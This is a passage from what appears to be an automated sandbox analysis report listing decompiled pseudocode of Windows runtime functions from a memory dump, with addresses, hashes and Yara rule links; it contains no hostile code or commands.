            Uniqueness Score: -1.00%

            Function 044E14FB, Relevance: .0, Instructions: 48COMMON
            Download Yara Rule
            C-Code - Quality: 61%
            			E044E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x451d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0446FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04447D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















            0x044e14fb
            0x044e14fb
            0x044e150a
            0x044e1514
            0x044e1519
            0x044e151b
            0x044e1526
            0x044e152c
            0x044e1534
            0x044e1537
            0x044e153a
            0x044e1545
            0x044e1557
            0x044e1547
            0x044e1550
            0x044e1550
            0x044e1562
            0x044e1563
            0x044e1565
            0x044e156a
            0x044e157f

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6852f6253bfd213335aafdc5f1a898e165d2218df0e6b3a71096e446479e3888
            • Instruction ID: 499312e82bbfbf5254b6fe4bfdf8c713ba602e4446f214e1f8e6cfeb19798278
            • Opcode Fuzzy Hash: 6852f6253bfd213335aafdc5f1a898e165d2218df0e6b3a71096e446479e3888
            • Instruction Fuzzy Hash: B5018071A00258ABDF10DF69D841EAEB7B8EF44700F40405BB905EB281DA74EA05CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044E138A, Relevance: .0, Instructions: 48COMMON
            Download Yara Rule
            C-Code - Quality: 61%
            			E044E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x451d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0446FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04447D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















            0x044e138a
            0x044e138a
            0x044e1399
            0x044e13a3
            0x044e13a8
            0x044e13aa
            0x044e13b5
            0x044e13bb
            0x044e13c3
            0x044e13c6
            0x044e13c9
            0x044e13d4
            0x044e13e6
            0x044e13d6
            0x044e13df
            0x044e13df
            0x044e13f1
            0x044e13f2
            0x044e13f4
            0x044e13f9
            0x044e140e

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 14c4f0f6fba646e2e65627537c12b6ccbde66f3057c20a2c1c56816ae273d3a3
            • Instruction ID: ff83d830fe0f9de4b9a6943e80ff154f75b379276a64f52b04f988d1d0677d4d
            • Opcode Fuzzy Hash: 14c4f0f6fba646e2e65627537c12b6ccbde66f3057c20a2c1c56816ae273d3a3
            • Instruction Fuzzy Hash: AA015271A00358AFDF14DFA9D881EAEB7B8EF44710F00405BB905EB381DA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F1074, Relevance: .0, Instructions: 46COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E044F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E044F165E(__ebx, 0x4518ae4, (__edx -  *0x4518b04 >> 0x14) + (__edx -  *0x4518b04 >> 0x14), __edi, __ecx, (__edx -  *0x4518b04 >> 0x14) + (__edx -  *0x4518b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E044EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04447D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E044DFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











            0x044f1074
            0x044f1080
            0x044f1082
            0x044f108a
            0x044f108f
            0x044f1093
            0x044f10ab
            0x044f10ab
            0x044f10c3
            0x044f10cf
            0x044f10e1
            0x044f10d1
            0x044f10da
            0x044f10da
            0x044f10e9
            0x044f10f5
            0x044f10f5
            0x044f10fe

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 94384b3961e12387fd9505e98bbf6274b7427540507170a704a34375b1d1de07
            • Instruction ID: 21f544a1b6bf65a53128d90e72895d521a12f5e1b2c51a7367c3b495d0d8fcb3
            • Opcode Fuzzy Hash: 94384b3961e12387fd9505e98bbf6274b7427540507170a704a34375b1d1de07
            • Instruction Fuzzy Hash: A601F572504741DFEB20EB29CD40B1A77E5AB84314F04852AF98693691EE34E845DB92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0443B02A, Relevance: .0, Instructions: 46COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0443B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04447D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E044A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







            0x0443b037
            0x0443b039
            0x0443b03b
            0x0443b040
            0x0448a60e
            0x00000000
            0x00000000
            0x0448a61d
            0x0443b04b
            0x0443b04e
            0x0448a627
            0x0448a634
            0x00000000
            0x00000000
            0x0448a641
            0x0448a653
            0x0448a643
            0x0448a64c
            0x0448a64c
            0x0448a65b
            0x00000000
            0x00000000
            0x00000000
            0x0448a66c
            0x0443b057
            0x0443b057
            0x0443b057
            0x0443b046
            0x0443b046
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
            • Instruction ID: d27e8f494c14daa7ef30969edba473a4dff671a8ada04a42ba9595892e25dc8b
            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
            • Instruction Fuzzy Hash: 5601B1312045C09FDB22DB1DC844F6B77E8EB85B54F0940A7E915DB752D668FC41CA20
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044DFE3F, Relevance: .0, Instructions: 46COMMON
            Download Yara Rule
            C-Code - Quality: 59%
            			E044DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x451d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0446FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04447D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0446B640(E04469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















            0x044dfe3f
            0x044dfe3f
            0x044dfe4e
            0x044dfe58
            0x044dfe5d
            0x044dfe5f
            0x044dfe6a
            0x044dfe72
            0x044dfe75
            0x044dfe78
            0x044dfe83
            0x044dfe95
            0x044dfe85
            0x044dfe8e
            0x044dfe8e
            0x044dfea0
            0x044dfea1
            0x044dfea3
            0x044dfea8
            0x044dfebd

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 62e878c1bb7df0030c1dfb9bb0022ff1e89cf83fe87d0140069e649ef4e7721e
            • Instruction ID: 23609073f70ed7f27f580d001bea92b8aa3150b93b2b8e2f3263ea64cce52987
            • Opcode Fuzzy Hash: 62e878c1bb7df0030c1dfb9bb0022ff1e89cf83fe87d0140069e649ef4e7721e
            • Instruction Fuzzy Hash: FE018471E00258ABEF14DFA9D845FAEB7B8EF44704F00406BB901EB391DA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044DFEC0, Relevance: .0, Instructions: 46COMMON
            Download Yara Rule
            C-Code - Quality: 59%
            			E044DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x451d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0446FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04447D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0446B640(E04469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















            0x044dfec0
            0x044dfec0
            0x044dfecf
            0x044dfed9
            0x044dfede
            0x044dfee0
            0x044dfeeb
            0x044dfef3
            0x044dfef6
            0x044dfef9
            0x044dff04
            0x044dff16
            0x044dff06
            0x044dff0f
            0x044dff0f
            0x044dff21
            0x044dff22
            0x044dff24
            0x044dff29
            0x044dff3e

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 905fc82b340dc833f3264b00f4c3b3b0f55d4b3c2718b709cb13ba6080b671a7
            • Instruction ID: e69257334281b1962cac6cd9d56362a980e3ce46f49f65f64c5523ce510c02ca
            • Opcode Fuzzy Hash: 905fc82b340dc833f3264b00f4c3b3b0f55d4b3c2718b709cb13ba6080b671a7
            • Instruction Fuzzy Hash: 97018F71E00258ABDF14DFA9D845FAFBBB8EF44704F00406BB901EB391EA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8A62, Relevance: .0, Instructions: 44COMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E044F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x451d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04447D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0446B640(E04469AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















            0x044f8a62
            0x044f8a71
            0x044f8a79
            0x044f8a82
            0x044f8a85
            0x044f8a89
            0x044f8a8c
            0x044f8a8f
            0x044f8a92
            0x044f8a95
            0x044f8a9f
            0x044f8ab1
            0x044f8aa1
            0x044f8aaa
            0x044f8aaa
            0x044f8abc
            0x044f8abd
            0x044f8abf
            0x044f8ac4
            0x044f8ada

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 924d4e22a5edca21e3f6d86eb329e93cb7d8d56d51cfcb01aaab019251590af0
            • Instruction ID: 91e06577433c9dbc4b5a9c4170577bd68cb8b9ecd20635aae1931b2416e9cb7b
            • Opcode Fuzzy Hash: 924d4e22a5edca21e3f6d86eb329e93cb7d8d56d51cfcb01aaab019251590af0
            • Instruction Fuzzy Hash: A1011EB1A002199FDB00DFA9D9419AEB7B8EF48314F10405BF905E7351D734A901CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8ED6, Relevance: .0, Instructions: 44COMMON
            Download Yara Rule
            C-Code - Quality: 54%
            			E044F8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x451d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04447D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0446B640(E04469AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















            0x044f8ed6
            0x044f8ee5
            0x044f8eed
            0x044f8ef0
            0x044f8efa
            0x044f8f03
            0x044f8f0c
            0x044f8f15
            0x044f8f24
            0x044f8f27
            0x044f8f31
            0x044f8f43
            0x044f8f33
            0x044f8f3c
            0x044f8f3c
            0x044f8f4e
            0x044f8f4f
            0x044f8f51
            0x044f8f56
            0x044f8f69

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dc46be4d765adc7f04a8514741479600c4eb5d64a679dda6fee531e677fdc103
            • Instruction ID: eb18f41b02db5caddd24f250c7c2058d8cf45cc93cf8febef9aff266869d173f
            • Opcode Fuzzy Hash: dc46be4d765adc7f04a8514741479600c4eb5d64a679dda6fee531e677fdc103
            • Instruction Fuzzy Hash: 0B110C70A002599FDB04DFA9D441AAEB7F4FB08300F0442AAE519EB382E634A941CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442DB60, Relevance: .0, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0442DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0442DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0442E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0442E8B0(__ecx, _t14, 0xfff);
							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







            0x0442db64
            0x0442db66
            0x0442db6b
            0x0442dbaa
            0x0442db71
            0x0442db76
            0x0442db7a
            0x0442dba3
            0x0442db7c
            0x0442db87
            0x0442db8b
            0x04484fa1
            0x04484fb3
            0x04484fb8
            0x0442db91
            0x0442db96
            0x0442db98
            0x0442db98
            0x0442db8b
            0x0442db7a
            0x0442db9d
            0x0442dba2

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
            • Instruction ID: 229562081f89542b6ec3f2baf5eda221c7a789226c300f600f972fe3b5f2bc77
            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
            • Instruction Fuzzy Hash: B7F04C73A005329FEF322A564AA0F5BBE959FC2B60F65003FF2049B345CA60BC0396D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442B1E1, Relevance: .0, Instructions: 42COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0442B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04447D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04447D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E044A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






            0x0442b1e8
            0x0442b1ea
            0x0442b1f3
            0x04484a17
            0x0442b1f9
            0x0442b1f9
            0x0442b1f9
            0x0442b201
            0x04484a21
            0x04484a2e
            0x00000000
            0x00000000
            0x04484a3b
            0x04484a4d
            0x04484a3d
            0x04484a46
            0x04484a46
            0x04484a55
            0x00000000
            0x00000000
            0x00000000
            0x0442b20a
            0x0442b20a
            0x0442b20a
            0x0442b20a

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
            • Instruction ID: 4d07b9b7aafb1a1abfa5b3e452e5a846912bdd516d5bf179be784bb4ac8c37ed
            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
            • Instruction Fuzzy Hash: DB01DB323006909BDB325B59C904F6ABB98EF51754F090467F9148B771E674F801C224
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044BFE87, Relevance: .0, Instructions: 38COMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E044BFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x451d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04447D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















            0x044bfe96
            0x044bfe9e
            0x044bfea1
            0x044bfead
            0x044bfeb3
            0x044bfeb9
            0x044bfec3
            0x044bfed5
            0x044bfec5
            0x044bfece
            0x044bfece
            0x044bfee0
            0x044bfee1
            0x044bfee3
            0x044bfee8
            0x044bfefb

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 257d8fc387513d38444d4498cf874636678e53b3d5e5558bf32f03ef4db58002
            • Instruction ID: 58e78442ce45e161b6f79be3be774f15c4042ed9a9bdf33a0f0c61f3e2bb7ec4
            • Opcode Fuzzy Hash: 257d8fc387513d38444d4498cf874636678e53b3d5e5558bf32f03ef4db58002
            • Instruction Fuzzy Hash: C5016270A00248AFDF14DFA9D941A6EB7F4FF04304F10415AA549DB392DA35EA06DB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F8F6A, Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            C-Code - Quality: 48%
            			E044F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x451d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04447D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0446B640(E04469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















            0x044f8f6a
            0x044f8f79
            0x044f8f81
            0x044f8f84
            0x044f8f8b
            0x044f8f91
            0x044f8f94
            0x044f8f9e
            0x044f8fb0
            0x044f8fa0
            0x044f8fa9
            0x044f8fa9
            0x044f8fbb
            0x044f8fbc
            0x044f8fbe
            0x044f8fc3
            0x044f8fd6

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 49caf55f56ccc7594d370fb61953db93d14492a5ad5d363b878079a427cf272d
            • Instruction ID: ce0a2d4848b91883f7c81a1097347ee0c6fcb2ab159e5b8a6f1a6c83d4e7c819
            • Opcode Fuzzy Hash: 49caf55f56ccc7594d370fb61953db93d14492a5ad5d363b878079a427cf272d
            • Instruction Fuzzy Hash: 13013174A00249AFDF00EFA9D945AAEB7F4EF48300F10445AB905EB381EB74EA00DB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044E131B, Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            C-Code - Quality: 48%
            			E044E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x451d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04447D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0446B640(E04469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















            0x044e131b
            0x044e132a
            0x044e1330
            0x044e1336
            0x044e133e
            0x044e1341
            0x044e1344
            0x044e134f
            0x044e1361
            0x044e1351
            0x044e135a
            0x044e135a
            0x044e136c
            0x044e136d
            0x044e136f
            0x044e1374
            0x044e1387

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d7fc24271d94f6a7186013526c2a28f83569b5106a9567aa759079c2d182d81
            • Instruction ID: a4f0e382876b07918875cd880251519b8068e0b1a20bb0dce8bbd675d2e4aa6f
            • Opcode Fuzzy Hash: 3d7fc24271d94f6a7186013526c2a28f83569b5106a9567aa759079c2d182d81
            • Instruction Fuzzy Hash: 730181B0A00248AFDF00DFA9D505AAEB7F4FF08300F00405AB845EB341EA34AA00CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0444C577, Relevance: .0, Instructions: 33COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0444C577(void* __ecx, char _a4) {
